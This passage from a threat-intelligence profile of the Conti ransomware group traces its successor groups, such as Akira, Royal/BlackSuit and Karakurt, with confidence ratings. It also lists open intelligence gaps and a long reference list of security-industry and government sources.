KarakurtConti side operation / extortion-only branchActive (reduced)Blockchain analysis: direct wallet connections to Conti; Arctic Wolf and Chainalysis corroboration; Zolotarjovs sentence confirms overlap [51]HIGHN/A
Royal / BlackSuitConti member continuation; assessed core Wizard Spider tierActive as BlackSuitBushidoToken threat intel; shared personnel and infrastructure indicators; FBI advisory confirms Conti connection [52]MEDIUM-HIGHN/A
AkiraConti operator continuation; affiliate and mid-tier operator continuityActive (2026)Blockchain evidence (TRM Labs 2026); shared laundering infrastructure; Russian-language artifacts; US sanctions and Zolotarjovs sentence confirm Conti lineage [4][6]HIGHView Profile →
BlackByteConti spinoffActive (reduced)AdvIntel/Kremez assessment; infrastructure overlap [15]MEDIUMN/A
DiavolConti/TrickBot sub-operationLargely dormantCode and infrastructure analysis; Arctic Wolf [51]MEDIUM-HIGHN/A
Analyst Inference: Cyclical Collapse Pattern

The February 2025 Black Basta internal chat leak followed the same pattern as the original Conti leak: an insider/disgruntled member published internal communications, directly contributing to the group's dissolution. The Conti diaspora appears condemned to repeat the cycle. The organizational model of large, salaried, multi-ethnic workforces creates structural insider threat exposure that pure-affiliate models do not share. Each generation of Conti-lineage groups inherits both the operational playbook and this structural vulnerability.

Intelligence Gaps (May 2026)
  • "Target" identity: Despite a $10M U.S. bounty and GangExposed's stated intent to identify him, Target's real name has not been publicly confirmed
  • Full financial scope: Total cryptocurrency holdings and current wallet infrastructure of the Conti diaspora are partially mapped but not fully documented
  • Formal state intelligence relationship: The exact nature of FSB involvement or passive tolerance remains an open question; leaked chats establish back-channel contact but not formal tasking
  • GangExposed identity and motivation: Source's own identity, access method, and motivations remain unconfirmed; possibility that GangExposed is state-adjacent cannot be ruled out
  • Akira/Royal operational leadership: Actor overlap assessed with high confidence; full attribution of current operational leadership to specific former Conti individuals is incomplete in public reporting
11 Sources
    [1]Rapid7 Blog: Conti Ransomware Group Internal Chats Leaked, March 2022: rapid7.com
    [2]BleepingComputer: Conti ransomware gang chats leaked by pro-Ukraine member, February 2022: bleepingcomputer.com
    [4]CybelAngel: Akira Ransomware: The Conti Successor Targeting the West, April 2026: cybelangel.com
    [5]Krebs on Security: Conti Ransomware Group Diaries, Part IV: Cryptocrime: krebsonsecurity.com
    [6]DOJ: Member of Prolific Russian Ransomware Group Sentenced to Prison, May 2026: justice.gov
    [8]Conti Unpacked: Understanding Ransomware Development As a Business: rapid7.com
    [9]CrowdStrike: WIZARD SPIDER Update: Resilient, Reactive and Resolute, 2020: crowdstrike.com
    [10]Krebs on Security: Conti Ransomware Group Diaries, Part I: Evasion: krebsonsecurity.com
    [11]CISA/FBI/NSA Advisory AA21-265A: Conti Ransomware, September 2021: cisa.gov
    [12]HSE Conti Cyber Attack Post Incident Review, 2021: hse.ie
    [13]Secureworks / ZScaler: Conti ransomware operations surge despite recent leak, 2022: zscaler.com
    [14]Morphisec: Conti Ransomware Group = Costa Rican Nightmare, 2022: morphisec.com
    [15]BleepingComputer: Conti Ransomware Operation Shut Down After Splitting into Smaller Groups, 2022: bleepingcomputer.com
    [16]DOJ: Multiple Foreign Nationals Charged in Connection with Trickbot Malware and Conti Ransomware Conspiracies, September 2023: justice.gov
    [17]UK FCDO / U.S. Treasury: UK and US sanction Conti and Trickbot ransomware gang members, September 2023: gov.uk
    [18]The Register: Mysterious leaker GangExposed outs Conti ransomware kingpins, May 2025: theregister.com
    [19]BleepingComputer: Germany doxxes Conti ransomware and TrickBot ring leader, 2025: bleepingcomputer.com
    [22]TRM Labs: TRM Analysis Corroborates Suspected Ties Between Conti and Ryuk: trmlabs.com
    [23]Krebs on Security: Conti Ransomware Group Diaries, Part II: The Office: krebsonsecurity.com
    [24]BleepingComputer: Conti ransomware shuts down operation, rebrands into smaller units: bleepingcomputer.com
    [25]SecurityWeek: Alleged Conti, TrickBot Gang Leader Unmasked, 2025: securityweek.com
    [27]U.S. Rewards for Justice: US offers $10M reward for info on five Conti ransomware members, August 2022: rewardsforjustice.net
    [30]Bitdefender: Free Conti Ransomware Decryptor Released, 2022: bitdefender.com
    [37]HSE/Panaseer: What the Irish Cyber Attack Tells Us About Security Controls (March-May 2021 timeline): panaseer.com
    [40]Krebs on Security: Conti Ransomware Group Diaries, Part IV: Cryptocrime: krebsonsecurity.com
    [41]U.S. State Department: US Government Offers $15M Reward for Info on Conti Actors, May 2022: rewardsforjustice.net
    [42]Reuters/AP: Costa Rica declares national emergency after Conti ransomware attack, May 2022
    [47]CyberScoop: Latvian national sentenced for ransomware attacks run by former Conti leaders, 2026: cyberscoop.com
    [48]Wired UK: Leaked Ransomware Docs Show Conti Helping Putin From the Shadows, March 2022: wired.co.uk
    [49]Analyst1: Black Basta Threat Actor Profile: analyst1.com
    [51]Arctic Wolf: The Karakurt Web: Threat Intel and Blockchain Analysis: arcticwolf.com
    [52]BushidoToken: The Continuity of Conti, 2022: bushidotoken.net